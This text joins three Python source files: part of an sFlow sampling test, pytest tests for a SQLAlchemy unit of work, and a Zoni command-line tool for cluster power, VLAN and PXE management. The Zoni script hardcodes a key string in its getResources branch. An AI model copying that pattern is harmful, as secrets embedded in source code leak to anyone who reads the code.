self.assertTrue(rcvd_agent_id == self.agent_id , "Agent id in Sampled packet is not expected . Expected : %s , received : %s"%(self.agent_id,rcvd_agent_id))
elements = port_sample[collector]['CounterSample'][i]['elements']
for element in elements:
try:
if 'ifName' in element and element['ifName'] in self.interfaces.keys():
intf = element['ifName']
counter_sample[intf] +=1
except KeyError:
pass
logging.info("....%s : Counter samples collected for Individual ports = %s" %(collector,counter_sample))
for port in counter_sample:
            # Accept up to 2 samples instead of exactly 1: counter sampling is random and
            # non-deterministic over the polling period, and there is an initial delay before the test starts.
self.assertTrue(1 <= counter_sample[port] <= 2," %s counter sample packets are collected in %s seconds of polling interval in port %s instead of 1 or 2 "%(counter_sample[port],self.polling_int,port))
#---------------------------------------------------------------------------
def analyze_flow_sample(self, data, collector):
logging.info("packets collected from interfaces ifindex : %s" %data['flow_port_count'])
logging.info("Expected number of packets from each port : %s to %s" % (100 * 0.6, 100 * 1.4))
for port in self.interfaces:
index = self.interfaces[port]['port_index'] ##NOTE: hsflowd is sending index instead of ifindex.
logging.info("....%s : Flow packets collected from port %s = %s"%(collector,port,data['flow_port_count'][index]))
if port in self.enabled_intf :
                # Check samples with a 40% tolerance: sampling is random, not deterministic,
                # but over many samples it should converge to a mean of 1 in N.
                # Number of packets sent = 100 * sampling rate of the interface
self.assertTrue(100 * 0.6 <= data['flow_port_count'][index] <= 100 * 1.4 ,
"Expected Number of samples are not collected collected from Interface %s in collector %s , Received %s" %(port,collector,data['flow_port_count'][index]))
else:
self.assertTrue(data['flow_port_count'][index] == 0 ,
"Packets are collected from Non Sflow interface %s in collector %s"%(port,collector))
#---------------------------------------------------------------------------
def sendTraffic(self):
src_ip_addr_templ = '192.168.{}.1'
ip_dst_addr = '192.168.0.4'
src_mac = self.dataplane.get_mac(0, 0)
pktlen=100
#send 100 * sampling_rate packets in each interface for better analysis
for j in range(0, 100, 1):
index = 0
for intf in self.interfaces:
ip_src_addr = src_ip_addr_templ.format(str(8 * index))
src_port = self.interfaces[intf]['ptf_indices']
dst_port = self.dst_port
tcp_pkt = simple_tcp_packet(pktlen=pktlen,
eth_dst=self.router_mac,
eth_src=src_mac,
ip_src=ip_src_addr,
ip_dst=ip_dst_addr,
ip_ttl=64)
no_of_packets=self.interfaces[intf]['sample_rate']
send(self,src_port,tcp_pkt,count=no_of_packets)
index+=1
pktlen += 10 # send traffic with different packet sizes
#--------------------------------------------------------------------------
def runTest(self):
self.generate_ArpResponderConfig()
time.sleep(1)
self.stop_collector=False
thr1 = threading.Thread(target=self.collector_0)
thr2 = threading.Thread(target=self.collector_1)
thr1.start()
time.sleep(2)
thr2.start()
#wait for the collectors to initialise
time.sleep(5)
pktlen=100
if self.poll_tests:
if self.polling_int==0:
time.sleep(20)
else:
#wait for polling time for collector to collect packets
logging.info("Waiting for % seconds of polling interval"%self.polling_int)
time.sleep(self.polling_int)
else:
self.sendTraffic()
time.sleep(10) # For Test Stability
self.stop_collector = True
thr1.join()
thr2.join()
logging.debug(self.collector0_samples)
logging.debug(self.collector1_samples)
self.packet_analyzer(self.collector0_samples,'collector0',self.poll_tests)
self.packet_analyzer(self.collector1_samples,'collector1',self.poll_tests)
|
test_uow.py
|
# pylint: disable=broad-except, too-many-arguments
import threading
import time
import traceback
from typing import List
from unittest.mock import Mock
import pytest
from allocation.domain import model
from allocation.service_layer import unit_of_work
from ..random_refs import random_sku, random_batchref, random_orderid
pytestmark = pytest.mark.usefixtures('mappers')
def insert_batch(session, ref, sku, qty, eta, product_version=1):
session.execute(
'INSERT INTO products (sku, version_number) VALUES (:sku, :version)',
dict(sku=sku, version=product_version),
)
session.execute(
'INSERT INTO batches (reference, sku, _purchased_quantity, eta)'
' VALUES (:ref, :sku, :qty, :eta)',
dict(ref=ref, sku=sku, qty=qty, eta=eta)
)
def get_allocated_batch_ref(session, orderid, sku):
[[orderlineid]] = session.execute(
'SELECT id FROM order_lines WHERE orderid=:orderid AND sku=:sku',
dict(orderid=orderid, sku=sku)
)
[[batchref]] = session.execute(
'SELECT b.reference FROM allocations JOIN batches AS b ON batch_id = b.id'
' WHERE orderline_id=:orderlineid',
dict(orderlineid=orderlineid)
)
return batchref
def test_uow_can_retrieve_a_batch_and_allocate_to_it(sqlite_session_factory):
session = sqlite_session_factory()
insert_batch(session, 'batch1', 'HIPSTER-WORKBENCH', 100, None)
session.commit()
uow = unit_of_work.SqlAlchemyUnitOfWork(sqlite_session_factory)
with uow:
product = uow.products.get(sku='HIPSTER-WORKBENCH')
line = model.OrderLine('o1', 'HIPSTER-WORKBENCH', 10)
product.allocate(line)
uow.commit()
batchref = get_allocated_batch_ref(session, 'o1', 'HIPSTER-WORKBENCH')
assert batchref == 'batch1'
def test_rolls_back_uncommitted_work_by_default(sqlite_session_factory):
uow = unit_of_work.SqlAlchemyUnitOfWork(sqlite_session_factory)
with uow:
insert_batch(uow.session, 'batch1', 'MEDIUM-PLINTH', 100, None)
new_session = sqlite_session_factory()
rows = list(new_session.execute('SELECT * FROM "batches"'))
assert rows == []
def test_rolls_back_on_error(sqlite_session_factory):
class MyException(Exception):
pass
uow = unit_of_work.SqlAlchemyUnitOfWork(sqlite_session_factory)
with pytest.raises(MyException):
with uow:
insert_batch(uow.session, 'batch1', 'LARGE-FORK', 100, None)
raise MyException()
new_session = sqlite_session_factory()
rows = list(new_session.execute('SELECT * FROM "batches"'))
assert rows == []
def try_to_allocate(orderid, sku, exceptions, session_factory):
line = model.OrderLine(orderid, sku, 10)
try:
with unit_of_work.SqlAlchemyUnitOfWork(session_factory) as uow:
product = uow.products.get(sku=sku)
product.allocate(line)
time.sleep(0.2)
uow.commit()
except Exception as e: # pylint: disable=broad-except
print(traceback.format_exc())
exceptions.append(e)
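# The test below exercises optimistic concurrency control: two threads try to
# allocate against the same product at once, only one commit may win, the
# product version number is bumped exactly once, and the loser is expected to
# fail with Postgres' "could not serialize access" error. (This assumes the
# unit of work's session uses a strict isolation level such as REPEATABLE READ
# or SERIALIZABLE; that configuration lives outside this test module.)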
def test_concurrent_updates_to_version_are_not_allowed(postgres_session_factory):
sku, batch = random_sku(), random_batchref()
session = postgres_session_factory()
insert_batch(session, batch, sku, 100, eta=None, product_version=1)
session.commit()
order1, order2 = random_orderid(1), random_orderid(2)
exceptions = [] # type: List[Exception]
try_to_allocate_order1 = lambda: try_to_allocate(
order1, sku, exceptions, postgres_session_factory
)
try_to_allocate_order2 = lambda: try_to_allocate(
order2, sku, exceptions, postgres_session_factory
)
thread1 = threading.Thread(target=try_to_allocate_order1)
thread2 = threading.Thread(target=try_to_allocate_order2)
thread1.start()
thread2.start()
thread1.join()
thread2.join()
[[version]] = session.execute(
"SELECT version_number FROM products WHERE sku=:sku",
dict(sku=sku),
)
assert version == 2
[exception] = exceptions
assert 'could not serialize access due to concurrent update' in str(exception)
orders = list(session.execute(
"SELECT orderid FROM allocations"
" JOIN batches ON allocations.batch_id = batches.id"
" JOIN order_lines ON allocations.orderline_id = order_lines.id"
" WHERE order_lines.sku=:sku",
dict(sku=sku),
))
assert len(orders) == 1
with unit_of_work.SqlAlchemyUnitOfWork(postgres_session_factory) as uow:
uow.session.execute('select 1')
|
zoni-cli.py
|
#! /usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import optparse
import socket
import logging.config
import getpass
import os
import sys
import re
import string
import subprocess
#from zoni import *
#from zoni.data.resourcequerysql import ResourceQuerySql
#import zoni
#from zoni.data.resourcequerysql import *
from zoni.bootstrap.pxe import Pxe
from zoni.hardware.ipmi import Ipmi
from zoni.hardware.dellswitch import HwDellSwitch
from zoni.hardware.raritanpdu import raritanDominionPx
from zoni.hardware.delldrac import dellDrac
import zoni.hardware.systemmanagement
from zoni.data import usermanagement
from zoni.agents.dhcpdns import DhcpDns
from zoni.extra.util import validIp, validMac, getConfig
from zoni.version import version, revision
from tashi.util import instantiateImplementation
#import zoni.data.usermanagement
#from usermanagement import UserManagement
# Extensions from MIMOS
from zoni.extensions.m_extensions import *
def parseTable():
pass
def main():
""" Main """
ver = version.split(" ")[0]
rev = revision
(configs, configFiles) = getConfig()
logging.config.fileConfig(configFiles)
#log = logging.getLogger(os.path.basename(__file__))
#logit(configs['logFile'], "Starting Zoni client")
#logit(configs['logFile'], "Loading config file")
parser = optparse.OptionParser(usage="%prog [-n] [-u] [--uid] [-v]", version="%prog " + ver + " " + rev)
parser.add_option("-n", "--nodeName", dest="nodeName", help="Specify node")
parser.add_option("--switchPort", "--switchport", dest="switchPort", help="Specify switchport switchname:portnum")
parser.add_option("-u", "--userName", dest="userName", help="Specify user name")
parser.add_option("--uid", dest="uid", help="Specify user id")
parser.add_option("-v", "--verbose", dest="verbosity", help="Be verbose", action="store_true", default=False)
parser.add_option("--Name", "--name", dest="Name", help="Specify name of entry")
parser.add_option("--Show", "--show", dest="show", help="Show something", default=None, action="store_true")
parser.add_option("-d", "--domain", dest="domain", help="Work with this domain")
parser.add_option("--notes", "--Notes", dest="myNotes", help="Notes", default="")
parser.add_option("--force", dest="forcefully", help="Apply gentle pressure", default=False, action="store_true")
# Hardware controller
group = optparse.OptionGroup(parser, "Hardware control", "Options for node power control")
group.add_option("--hw", dest="hardwareType", help="Make hardware call to ipmi|drac|pdu")
group.add_option("--powerStatus", "--powerstatus", dest="POWERSTATUS", help="Get power status on node", action="store_true", default=False)
group.add_option("--reboot", "--reboot", dest="REBOOTNODE", help="Reboot node (Soft)", action="store_true", default=False)
group.add_option("--powerCycle", "--powercycle", dest="POWERCYCLE", help="Power Cycle (Hard)", action="store_true", default=False)
group.add_option("--powerOff", "--poweroff", dest="POWEROFF", help="Power off node", action="store_true", default=False)
group.add_option("--powerOffSoft", "--poweroffsoft", dest="POWEROFFSOFT", help="Power off node (soft)", action="store_true", default=False)
group.add_option("--powerOn", "--poweron", dest="POWERON", help="Power on node", action="store_true", default=False)
group.add_option("--powerReset", "--powerreset", dest="POWERRESET", help="Power reset node", action="store_true", default=False)
group.add_option("--console", dest="CONSOLE", help="Console mode", action="store_true", default=False)
# Extensions from MIMOS - specific only for HP Blades and HP c7000 Blade Enclosures
group.add_option("--powerOnNet", "--poweronnet", dest="POWERONENET", help="Power on Node into PXE (Currently support on HP Blades through HP c7000 Blade Enclosure)", action="store_true", default=False)
parser.add_option_group(group)
# Query Interface
group = optparse.OptionGroup(parser, "Query Interface", "Query current systems and allocations")
group.add_option("-R", "--showReservation", "--showreservation", dest="showReservation", help="Show current node reservations", action="store_true", default=False)
group.add_option("-A", "--showAllocation", "--showallocation", dest="showAllocation", help="Show current node allocation", action="store_true", default=False)
group.add_option("-S", "--showResources", dest="showResources", help="Show available resources to choose from", action="store_true", default=False)
group.add_option("--getResources", "--getresources", dest="getResources", help="Get available resources to choose from", action="store_true", default=False)
group.add_option("-p", "--procs", dest="numProcs", help="Set number of processors" )
group.add_option("-c", "--clock", dest="clockSpeed", help="Processor clock" )
group.add_option("--memory", dest="numMemory", help="Amount of memory (Bytes)" )
group.add_option("-f", "--cpuflags", dest="cpuFlags", help="CPU flags" )
group.add_option("--cores", dest="numCores", help="Number of Cores" )
group.add_option("-I", "--showPxeImages", "--showpxeimages", dest="showPxeImages", help="Show available PXE images to choose from", action="store_true", default=False)
group.add_option("-M", "--showPxeImageMap", "--showpxeimagemap", dest="showPxeImageMap", help="Show PXE images host mapping", action="store_true", default=False)
parser.add_option_group(group)
#parser.add_option("-p", "--printResources", dest="printResources", help="Print available resources to choose from", action="store_true", default=False)
# Admin Interface
group = optparse.OptionGroup(parser, "Admin Interface", "Administration Interface:")
group.add_option("--admin", dest="ADMIN", help="Enter Admin mode", action="store_true", default=False)
group.add_option("--setPortMode", "--setportmode", dest="setPortMode", help="Set port mode to access, trunk, or general")
group.add_option("--enableHostPort", "--enablehostport", dest="enableHostPort", help="Enable a switch port", action="store_true", default=False)
group.add_option("--disableHostPort", "--disablehostport", dest="disableHostPort", help="Disable a switch port", action="store_true", default=False)
group.add_option("--destroyVlan", "--destroyvlan", dest="destroyVlanId", help="Remove vlan from all switches")
group.add_option("--createVlan", "--createvlan", dest="createVlanId", help="Create a vlan on all switches")
group.add_option("--addNodeToVlan", "--addnodetovlan", dest="add2Vlan", help="Add node to a vlan (:tagged)")
group.add_option("--removeNodeFromVlan", "--removenodefromvlan", dest="removeFromVlan", help="Remove node from a vlan")
group.add_option("--setNativeVlan", "--setnativevlan", dest="setNative", help="Configure native vlan")
group.add_option("--restoreNativeVlan", "--restorenativevlan", dest="restoreNative", help="Restore native vlan", action="store_true", default=False)
group.add_option("--removeAllVlans", "--removeallvlans", dest="removeAllVlans", help="Removes all vlans from a switchport", action="store_true", default=False)
group.add_option("--sendSwitchCommand", "--sendswitchcommand", dest="sendSwitchCommand", help="Send Raw Switch Command, VERY DANGEROUS. config;interface switchport ethernet g14;etc")
group.add_option("--interactiveSwitchConfig", "--interactiveswitchconfig", dest="interactiveSwitchConfig", help="Interactively configure a switch. switchhname")
group.add_option("--showSwitchConfig", "--showswitchconfig", dest="showSwitchConfig", help="Show switch config for node", action="store_true", default=False)
group.add_option("--register", dest="register", help="Register hardware to Zoni", action="store_true", default=False)
group.add_option("--labelPort", dest="labelPort", help="Label switch port", action="store_true", default=False)
group.add_option("--saveConfig", dest="saveConfig", help="SWITCHNAME - Save Switch Config")
parser.add_option_group(group)
# Switch
#group = optparse.OptionGroup(parser, "Switch Interface", "Switch Interface:")
#group.add_option("--rawswitch", dest="RAWSWITCH", help="Enter RAW Switch Admin mode", action="store_true", default=False)
#group.add_option("--enablePort", "--enableport", dest="enablePort", help="Enable a port on the switch")
#group.add_option("--disablePort", "--disableport", dest="disablePort", help="Disable a port on the switch")
#group.add_option("--addVlanToTrunks", "--addvlantotrunks", dest="addVlanToTrunks", help="")
# Domain Interface
group = optparse.OptionGroup(parser, "Domain Interface", "Manage Zoni Domain:")
group.add_option("-D", "--showDomains", "--showdomains", dest="showDomains", help="Show Zoni domains", action="store_true", default=False)
group.add_option("--addDomain", "--adddomain", dest="addDomain", help="Add new domain to Zoni", action="store_true", default=False)
group.add_option("--removeDomain", "--removedomain", dest="removeDomain", help="remove a domain from Zoni", action="store_true", default=False)
group.add_option("-V", "--showVlans", "--showvlans", dest="showVlans", help="Show an from Zoni", action="store_true", default=False)
#group.add_option("--addVlan", "--addvlan", dest="addVlan", help="Add new vlan to Zoni", action="store_true", default=False)
#group.add_option("--removeVlan", "--removevlan", dest="removeVlan", help="Remove an from Zoni", action="store_true", default=False)
group.add_option("--assignVlan", "--assignvlan", dest="assignVlan", help="Assign vlan to a domain")
parser.add_option_group(group)
# Allocation Interface
group = optparse.OptionGroup(parser, "Allocation Interface", "Change current systems allocations:")
#group.add_option("--addReservation", "--addreservation", dest="addReservation", help="Add a Reservation", action="store_true", default=False)
group.add_option("--addImage", "--addimage", dest="addImage", help="Add image to Zoni - amd64-image:dist:dist_ver")
group.add_option("--delImage", "--delimage", dest="delImage", help="Delete PXE image")
#group.add_option("--addPxeImage", "--addpxeimage", dest="imageName", help="Add PXE image to database", action="store_true", default=False)
group.add_option("--assignImage", "--assignimage", dest="assignImage", help="Assign image to resource")
group.add_option("--imageName", "--imagename", dest="imageName", help="Assign image to resource")
group.add_option("--allocateNode", "--allocatenode", dest="allocateNode", help="Assign node to a user", action="store_true", default=False)
group.add_option("--vlaninfo", "--vlanInfo", dest="vlanInfo", help="Specify vlan info for allocation")
group.add_option("--vlanIsolate", "--vlanisolate", dest="vlanIsolate", help="Specify vlan for network isolation")
group.add_option("--hostName", "--hostname", dest="hostName", help="Specify hostname for node")
group.add_option("--ipaddr", dest="ipAddr", help="Specify ip address for node")
group.add_option("--releaseNode", "--releasenode", dest="releaseNode", help="Release current node allocation", action="store_true", default=False)
group.add_option("--reservationDuration", "--reservationduration", dest="reservationDuration", help="Specify duration of node reservation - YYYYMMDD format")
group.add_option("-r", "--reservationId", "--reservationid", dest="reservationId", help="Reservation ID")
group.add_option("--updateReservation", "--updatereservation", dest="updateReservation", help="Update Reservation", action="store_true", default=False)
group.add_option("--delReservation", "--delreservation", dest="delReservation", help="Delete Reservation")
group.add_option("--rgasstest", dest="rgasstest", help="Debug testing function", action="store_true", default=False)
parser.add_option_group(group)
group = optparse.OptionGroup(parser, "Reservation Interface", "Change current systems reservations:")
group.add_option("--createReservation", "--createreservation", dest="createReservation", help="Create a new Reservation", action="store_true", default=False)
parser.add_option_group(group)
# Zoni Helpers
group = optparse.OptionGroup(parser, "Zoni Helpers", "Helper functions:")
group.add_option("--addDns", dest="addDns", help="Add a DNS entry", action="store_true", default=False)
group.add_option("--removeDns", dest="removeDns", help="Remove a DNS entry", action="store_true", default=False)
group.add_option("--addCname", dest="addCname", help="Add a DNS Cname entry", action="store_true", default=False)
group.add_option("--removeCname", dest="removeCname", help="Remove a DNS Cname entry", action="store_true", default=False)
group.add_option("--addDhcp", dest="addDhcp", help="Add a DHCP entry", action="store_true", default=False)
group.add_option("--removeDhcp", dest="removeDhcp", help="Remove a DHCP entry", action="store_true", default=False)
parser.add_option_group(group)
# Extensions from MIMOS
group = optparse.OptionGroup(parser, "Zoni MIMOS Extensions", "Special Functions created by MIMOS Lab:")
group.add_option("--addRole", "--addrole", dest="addRole", help="Create a disk based installation default file for a node based on its role or function, e.g. one|oned|cc|clc|walrus|sc|nc|preseed|kickstart", default=None, action="store")
group.add_option("--removeRole", "--removerole", dest="removeRole", help="Remove the default file of a node", action="store_true", default=False)
group.add_option("--showRoleMap", dest="showRoleMap", help="Show Role to Host Mapping", action="store_true", default=False)
group.add_option("--showKernel", dest="showKernelInfo", help="Show Kernel Info", action="store_true", default=False)
group.add_option("--showInitrd", dest="showInitrdInfo", help="Show Initrd Info", action="store_true", default=False)
group.add_option("--registerKernelInitrd", dest="registerKernelInitrd", help="Register Kernel and Initrd - vmlinuz:vmlinuz-ver:vmlinuz-arch:initrd:initrd-arch:imagename")
group.add_option("--getKernelInitrdID", dest="getKernelInitrdID", help="Get corresponding Kernel and Initrd Info - vmlinuz:initrd:arch")
group.add_option("--getConfig", dest="getConfig", help="Get a value from ZoniDefault.cfg - e.g. tftpRootDir, initrdRoot, kernelRoot, fsImagesBaseDir, etc.", default=None, action="store")
parser.add_option_group(group)
(options, args) = parser.parse_args()
cmdargs = {}
# setup db connection
#print "starting tread"
#threading.Thread(daemon=True, target=self.dbKeepAlive()).start()
#print "after tread"
data = instantiateImplementation("zoni.data.resourcequerysql.ResourceQuerySql", configs, options.verbosity)
reservation = instantiateImplementation("zoni.data.reservation.reservationMysql", configs, data, options.verbosity)
#query = zoni.data.resourcequerysql.ResourceQuerySql(configs, options.verbosity)
# Extensions from MIMOS
mimos = instantiateImplementation("zoni.extensions.m_extensions.mimos",configs)
# Get host info
host=None
if options.nodeName:
host = data.getHostInfo(options.nodeName)
#print host
# Hardware control
if options.hardwareType and options.nodeName:
host = data.getHostInfo(options.nodeName)
if options.hardwareType == "ipmi":
#hardware = zoni.hardware.systemmanagement.SystemManagement(configs,data)
hw = Ipmi(configs, options.nodeName, host)
#
if options.hardwareType == "pdu":
hw = raritanDominionPx(configs, options.nodeName, host)
#
if options.hardwareType == "drac":
## Check if node has drac card
if "drac_name" in host:
hw= dellDrac(configs, options.nodeName, host)
else:
mesg = "Host (%s) does not have a DRAC card!!\n" % options.nodeName
sys.stdout.write(mesg)
exit(1)
## Extensions from MIMOS - For Dell Blades - calling Dell Blades via the Blade Enclosure; some DRAC commands in the blade enclosure differ slightly from those on the actual blade, so this allows a bit more flexibility and standard calls to the blades
if options.hardwareType == "dracblade":
hw = dellBlade(configs, options.nodeName, host)
## Extensions from MIMOS - For HP Blades - calling HP Blades via the HP c7000 Blade Enclosure instead of directly to the blade server itself; this allows a bit more flexibility and standard calls to the blades
if options.hardwareType == "hpilo":
hw = hpILO(configs, options.nodeName, host)
if (options.REBOOTNODE or options.POWERCYCLE or options.POWEROFF or options.POWEROFFSOFT or \
options.POWERON or options.POWERSTATUS or options.CONSOLE or \
options.POWERONNET or options.POWERRESET) and options.nodeName: # Extensions from MIMOS - added POWERONNET
if options.verbosity:
hw.setVerbose(True)
if options.REBOOTNODE:
hw.powerReset()
exit()
if options.POWERCYCLE:
hw.powerCycle()
exit()
if options.POWEROFF:
hw.powerOff()
exit()
if options.POWEROFFSOFT:
hw.powerOffSoft()
exit()
if options.POWERON:
hw.powerOn()
exit()
if options.POWERRESET:
hw.powerReset()
exit()
if options.POWERSTATUS:
hw.getPowerStatus()
exit()
if options.CONSOLE:
hw.activateConsole()
exit()
## Extensions from MIMOS - For HP Blade via c7000 Blade Enclosure
if options.POWERONNET:
hw.powerOnNet()
exit()
hw.getPowerStatus()
exit()
else:
hw = zoni.hardware.systemmanagement.SystemManagement(configs,data)
if (options.REBOOTNODE or options.POWERCYCLE or options.POWEROFF or options.POWEROFFSOFT or \
options.POWERON or options.POWERSTATUS or options.CONSOLE or \
options.POWERRESET) and options.nodeName:
if options.verbosity:
hw.setVerbose(True)
if options.REBOOTNODE:
hw.powerReset(options.nodeName)
exit()
if options.POWERCYCLE:
hw.powerCycle(options.nodeName)
exit()
if options.POWEROFFSOFT:
hw.powerOffSoft(options.nodeName)
exit()
if options.POWEROFF:
hw.powerOff(options.nodeName)
exit()
if options.POWERON:
hw.powerOn(options.nodeName)
exit()
if options.POWERRESET:
hw.powerReset(options.nodeName)
exit()
if options.POWERSTATUS:
hw.getPowerStatus(options.nodeName)
exit()
if options.CONSOLE:
hw.activateConsole(options.nodeName)
exit()
hw.getPowerStatus(options.nodeName)
if (options.REBOOTNODE or options.POWERCYCLE or options.POWEROFF or \
options.POWERON or options.POWERSTATUS or options.CONSOLE or \
options.POWERRESET) and not options.nodeName:
parser.print_help()
mesg = "\nMISSSING OPTION: Node name required -n or --nodeName\n"
print mesg
exit()
# Query Interface
if (options.numProcs):
cmdargs["num_procs"] = options.numProcs
if (options.numMemory):
cmdargs["mem_total"] = options.numMemory
if (options.clockSpeed):
cmdargs["clock_speed"] = options.clockSpeed
if (options.numCores):
cmdargs["num_cores"] = options.numCores
if (options.cpuFlags):
cmdargs["cpu_flags"] = options.cpuFlags
if (options.nodeName):
cmdargs["sys_id"] = options.nodeName
if (options.numCores or options.clockSpeed or options.numMemory or options.numProcs or options.cpuFlags) and not options.showResources:
usage = "MISSING OPTION: When specifying hardware parameters, you need the -s or --showResources switch"
print usage
parser.print_help()
exit()
if options.getResources:
print "ALL resources"
print data.getAvailableResources()
key = "3Lf7Qy1oJZue1q/e3ZQbfg=="
print "Tashi Resources"
print data.getMyResources(key)
# Show current allocations
if (options.showAllocation) or (options.show and re.match(".lloca.*", args[0])):
if options.uid:
nameorid = int(options.uid)
else:
nameorid = options.userName
data.showAllocation(nameorid)
exit()
# Show current reservation
if options.showReservation or (options.show and re.match(".eserv.*", args[0])):
if options.uid:
nameorid = int(options.uid)
else:
nameorid = options.userName
data.showReservation(nameorid)
# Print all Resources
if options.showResources or (options.show and re.match(".esour.*", args[0])):
data.showResources(cmdargs)
# Show PXE images
#if (options.show and re.match(".esour.*", args[0])):
if options.showPxeImages or (options.show and re.match("pxei.*", args[0])):
data.showPxeImages()
# Show machine to PXE image mapping
if options.showPxeImageMap or (options.show and re.match("pxem.*", args[0])):
data.showPxeImagesToSystemMap(cmdargs)
if (len(sys.argv) == 1):
parser.print_help()
exit()
# Delete reservation
if (options.delReservation):
data.removeReservation(options.delReservation)
exit()
# Specify usermanagement, ldap or files
if configs['userManagement'] == "ldap":
usermgt = usermanagement.ldap()
elif configs['userManagement'] == "files":
usermgt = usermanagement.files()
else:
print "User management problem"
exit()
if (options.rgasstest):
#data.getHardwareCapabilities(options.nodeName)
#pdu = raritanDominionPx(host)
#print pdu
#bootit = pxe.Pxe(configs, options.verbosity)
#bootit.createPxeUpdateFile(data.getPxeImages())
#bootit.updatePxe()
#print "host is ", host
#drac = dellDrac("drac-r2r1c3", 1)
drac = dellDrac(configs, options.nodeName, host)
#drac.getPowerStatus()
#drac.powerOff()
#drac.powerOn()
#drac.powerCycle()
drac.setVerbose(options.verbosity)
drac.powerReset()
#drac.getPowerStatus()
#print "host is ", host
#pdu = raritanDominionPx(configs, options.nodeName, host)
#print "pdu", pdu
#pdu.getPowerStatus()
#exit()
# Create a reservation for a user
if (options.createReservation):
if not (options.userName or options.uid):
mesg = "ERROR: CreateReservation requires the following arguments...\n"
if not (options.userName or options.uid):
mesg += " Username: --userName=username or --uid 1000\n"
mesg += " Reservation Duration: --reservationDuration YYYYMMDD or numdays(optional, default 15 days)\n"
mesg += " Notes: --notes(optional)\n"
sys.stderr.write(mesg)
exit()
userId = options.uid
if not userId:
userId = usermgt.getUserId(options.userName)
if userId:
__reservationId = reservation.createReservation(userId, options.reservationDuration, options.myNotes + " " + str(string.join(args[0:len(args)])))
else:
print "user doesn't exist"
exit()
# Allocate node to user
if (options.allocateNode):
if options.reservationId and options.domain and options.vlanInfo and options.nodeName and options.imageName:
host = data.getHostInfo(options.nodeName)
# optparse does not pass multiple args that are quoted anymore?
# Used to work with python 2.5.2. Doesn't work with python 2.6.5.
data.allocateNode(options.reservationId, options.domain, host['sys_id'], options.vlanInfo, options.imageName, options.hostName, options.myNotes + " " + str(string.join(args[0:len(args)])))
else:
mesg = "USAGE: %s --allocateNode --nodeName nodeName --domain domainname --reservationId ID --vlanInfo vlanNums:info, --imageName imagename [--notes]\n" % (sys.argv[0])
mesg += "Options\n"
mesg += " --domain testdomain\n"
mesg += " --reservationId 10\n"
mesg += " --vlanInfo 999:native,1000:tagged,1001:tagged\n"
mesg += " --imageName imageName (see available images with 'zoni -I')\n"
mesg += " --hostName mynode01 (optional)\n"
mesg += " --notes \"your notes here \"(optional)\n"
sys.stdout.write(mesg)
exit()
if not (options.reservationId) or not options.nodeName:
mesg = "ERROR: AllocateNode requires the following arguments...\n"
if not (options.nodeName):
mesg += " NodeName: --nodeName r1r1u25 \n"
if not (options.reservationId):
mesg += " ReservationId: --reservationId IDNUM(add nodes to an existing reservation)\n"
mesg += " Hostname: --hostName mynode01\n"
mesg += " Domain: --vlanIsolate vlan_num(default 999)\n"
mesg += " IP address: --ipaddr 172.17.10.100\n"
mesg += " Notes: --notes(optional)\n"
sys.stderr.write(mesg)
exit()
# Reconfigure switchports
memberMap = data.getDomainMembership(host['sys_id'])
HwSwitch = HwDellSwitch
hwswitch = HwSwitch(configs, host)
for vlan, tag in memberMap.iteritems():
hwswitch.addNodeToVlan(vlan, tag)
# Register node in DNS
if options.hostName:
# Add cname
cmd = "zoni --addCname %s %s" % (options.hostName, host['location'])
subprocess.Popen(string.split(cmd))
#data.allocateNode(options.reservationId, options.domain, host['sys_id'], options.vlanInfo, options.imageName, options.hostName, options.myNotes + " " + str(string.join(args[0:len(args)])))
#data.allocateNode(options.reservationId, host['sys_id'], options.hostName, vlanNum, options.ipAddr, options.myNotes)
exit()
# Update allocation
if (options.updateReservation):
if not options.reservationId:
mesg = "ERROR: UpdateReservation requires the following arguments...\n"
if not (options.reservationId):
mesg += " Reservation ID: --reservationId RES\n"
mesg += " NodeName: --nodeName r1r1u25 (optional)\n"
mesg += " Username: --userName=username or --uid 1000 (optional)\n"
mesg += " Reservation Duration: --reservationDuration YYYYMMDD or numdays (optional, default 15 days)\n"
mesg += " Vlan: --vlanIsolate vlan_num(optional)\n"
mesg += " Notes: --notes(optional)\n"
sys.stderr.write(mesg)
exit()
userId = None
if options.uid or options.userName:
# Get the username from uid
userId = options.uid
if not options.uid:
userId = usermgt.getUserId(options.userName)
data.updateReservation(options.reservationId, userId, options.reservationDuration, options.vlanIsolate, options.myNotes)
# Release node allocation
if (options.releaseNode):
if not options.nodeName:
mesg = "ERROR: releaseNode requires the following arguments...\n"
if not (options.nodeName):
mesg += " NodeName: --nodeName r1r1u25 \n"
sys.stderr.write(mesg)
exit()
data.releaseNode(options.nodeName)
# Assign image to host
if (options.assignImage):
if not options.nodeName:
usage = "Node not specified. Please specify a node with --nodeName or -n"
print usage
exit()
# need to fix this later
#if data.assignImagetoHost(host, options.assignImage):
#print "ERROR"
#exit()
# Update PXE
bootit = Pxe(configs, data, options.verbosity)
bootit.setBootImage(host['mac_addr'], options.assignImage)
#bootit.createPxeUpdateFile(data.getPxeImages())
#bootit.updatePxe()
# Add image to database
if (options.addImage):
data.addImage(options.addImage)
# Delete PXE image
if (options.delImage):
data.delImage(options.delImage)
# Domain interface
if (options.showDomains):
data.showDomains()
if (options.addDomain):
if len(args) > 2 and options.vlanInfo:
data.addDomain(args[0], string.join(args[1:len(args)]), options.vlanInfo)
else:
mesg = "USAGE: %s --addDomain domainname \"domain desc\" --vlanInfo vlan:type,vlan:type\n" % (sys.argv[0])
mesg += "Options\n\n --vlanInfo 999:native,1000:untagged,1001:tagged\n"
sys.stdout.write(mesg)
exit()
if (options.removeDomain):
if len(args) > 0:
data.removeDomain(args[0])
else:
mesg = "USAGE: %s --removeDomain domainname \n" % (sys.argv[0])
sys.stdout.write(mesg)
exit()
if (options.showVlans):
data.showVlans()
#if (options.addVlan):
#print len(args)
#if len(args) > 0:
#data.addVlan(args[0], string.join(args[1:len(args)]))
#else:
#mesg = "USAGE: %s --addVlan vlanNumber [VlanDesc]\n" % (sys.argv[0])
#sys.stdout.write(mesg)
#exit()
#if (options.removeVlan):
